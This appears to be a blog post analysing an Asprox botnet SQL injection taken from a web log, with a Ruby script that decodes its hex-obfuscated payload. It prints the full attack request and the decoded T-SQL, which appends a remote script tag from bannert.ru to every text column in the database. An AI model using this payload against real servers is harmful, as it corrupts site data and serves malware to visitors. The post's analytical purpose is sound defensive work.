Asprox is one of the botnet that implements mass sql injection to inject malicious *.js script into MSSQL database server. Normally Asprox bot will search for any vulnerable (sql injection, of course) *.asp script to inject the malicious *.js script and iframe into database. Typical sql injection is similar to log below:
GET /page.asp?id=425;d EcLaRe @s VArcHAr(4000);sET @s=cASt(0x4445636C615245204054205661 724348415228323535292C40632056417263 6841722832353529204465436C4152652074 41626C655F437572736F7220437552736F72 20664F522073454C45637420612E6E416D65 2C622E6E414D452066726F6D207359734F62 6A4563547320612C735973636F4C756D6E73 206220774845726520412E69643D622E4964 20614E4420612E78547970653D2755272061 4E642028622E78745950653D3939206F7220 422E78545970453D3335204F7220622E7874 5950453D323331206F5220622E5874595065 3D31363729206F50456E207441426C655F43 7572734F72204665544368206E4558742066 724F6D205441426C655F637572734F522069 4E744F2040542C4043205748494C45284040 46457443685F5354415475533D3029204245 47696E20657865432827757044417465205B 272B40542B275D20534574205B272B40432B 275D3D527452696D28434F6E564552542856 4152636841522834303030292C5B272B4043 2B275D29292B434173742830783343373336 333732363937303734323037333732363333 443638373437343730334132463246373737 373737324536323631364536453635373237 343245373237353246363136343733324536 413733334533433246373336333732363937 303734334520417320564152634841722835 3129292729204645546348204E4558542066 726F6D207441626C655F435572734F722049 4E744F2040542C404320456E6420434C6F73 45207461626C455F635572736F5220644541 6C4C4F63617465207441624C655F43757273 6F7220 AS vaRcHaR(4000));eXeC (@s);--
HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
*/*;q=0.1
Accept-Language: en-gb
Accept-Encoding: deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20090728 Firefox/1.5.0 Opera 9.25
Host: www.xxxx.com
Connection: Close
It’s a little bit annoying to decode all the hex chars. It’s obvious that the sql injection input is about to bypass string-based content filtering :). Out of curiosity about this sql injection, i managed to code a little ruby code to decode the sql injection (using normal trick by converting hex input via cast function). Below is the result, sample usage of the code and sample output:
shell>$ruby hex2ascii.rb '4445636C615245204054205661 724348415228323535292C40632056417263 6841722832353529204465436C4152652074 41626C655F437572736F7220437552736F72 20664F522073454C45637420612E6E416D65 2C622E6E414D452066726F6D207359734F62 6A4563547320612C735973636F4C756D6E73 206220774845726520412E69643D622E4964 20614E4420612E78547970653D2755272061 4E642028622E78745950653D3939206F7220 422E78545970453D3335204F7220622E7874 5950453D323331206F5220622E5874595065 3D31363729206F50456E207441426C655F43 7572734F72204665544368206E4558742066 724F6D205441426C655F637572734F522069 4E744F2040542C4043205748494C45284040 46457443685F5354415475533D3029204245 47696E20657865432827757044417465205B 272B40542B275D20534574205B272B40432B 275D3D527452696D28434F6E564552542856 4152636841522834303030292C5B272B4043 2B275D29292B434173742830783343373336 333732363937303734323037333732363333 443638373437343730334132463246373737 373737324536323631364536453635373237 343245373237353246363136343733324536 413733334533433246373336333732363937 303734334520417320564152634841722835 3129292729204645546348204E4558542066 726F6D207441626C655F435572734F722049 4E744F2040542C404320456E6420434C6F73 45207461626C455F635572736F5220644541 6C4C4F63617465207441624C655F43757273 6F7220'
[+] encoded string : DEclaRE @T VarCHAR(255),@c VArchAr(255) DeClARe tAble_Cursor CuRsor fOR sELEct a.nAme,b.nAME from sYsObjEcTs a,sYscoLumns b wHEre A.id=b.Id aND a.xType='U' aNd (b.xtYPe=99 or B.xTYpE=35 Or b.xtYPE=231 oR b.XtYPe=167) oPEn tABle_CursOr FeTCh nEXt frOm TABle_cursOR iNtO @T,@C WHILE(@@FEtCh_STATuS=0) BEGin exeC('upDAte ['+@T+'] SEt ['+@C+']=RtRim(COnVERT(VARchAR(4000),['+@C+']))+CAst(0x3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E As VARcHAr(51))') FETcH NEXT from tAble_CUrsOr INtO @T,@C End CLosE tablE_cUrsoR dEAlLOcate tAbLe_Cursor
Since in this sql injection, it used double payload of hex trick. So i need to re-execute the code again for this one:
CAst(0x3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E)
shell>$ ruby hex2ascii.rb 3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E
[+] encoded string :
all the output need to concat again with previous string like AS vaRcHaR(4000));eXeC (@s);–. So the final sql statement will look similar to this:
d EcLaRe @s VArcHAr(4000);sET @s=DEclaRE @T VarCHAR(255),@c VArchAr(255) DeClARe tAble_Cursor CuRsor fOR sELEct a.nAme,b.nAME from sYsObjEcTs a,sYscoLumns b wHEre A.id=b.Id aND a.xType='U' aNd (b.xtYPe=99 or B.xTYpE=35 Or b.xtYPE=231 oR b.XtYPe=167) oPEn tABle_CursOr FeTCh nEXt frOm TABle_cursOR iNtO @T,@C WHILE(@@FEtCh_STATuS=0) BEGin exeC('upDAte ['+@T+'] SEt ['+@C+']=RtRim(COnVERT(VARchAR(4000),['+@C+']))+CAst( As VARcHAr(51))') FETcH NEXT from tAble_CUrsOr INtO @T,@C End CLosE tablE_cUrsoR dEAlLOcate tAbLe_Cursor
From the output, we knew that attacker try to inject into the database by injecting <script src=http://www.bannert.ru/ads.js>. This script will later on will be used as iframe on the compromised database/web server to silently fetch a ads.js. Unfortunately, the ads.js is no longer available during this blog entry posted.
Below is the simple ruby code for the decoding hex values. Your need to supply input within cast functions.
#!/usr/bin/ruby
#copy this code and save as hex2ascii.rb
def usage
puts "[+] usage: ruby hex2ascii input_string"
end
data=ARGV[0]
result=Array.new
if data==nil
usage()
else
data=data.delete(" ")
data.scan(/../).each{|a|
puts a
result << a.hex.chr
}
puts "[+] encoded string : #{result.to_s}"
end
Here is how u can use the code:
shell>$ ruby hex2ascii.rb '3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E'
[+] encoded string :
* don’t forget to use quote (‘ ‘) when key in your input.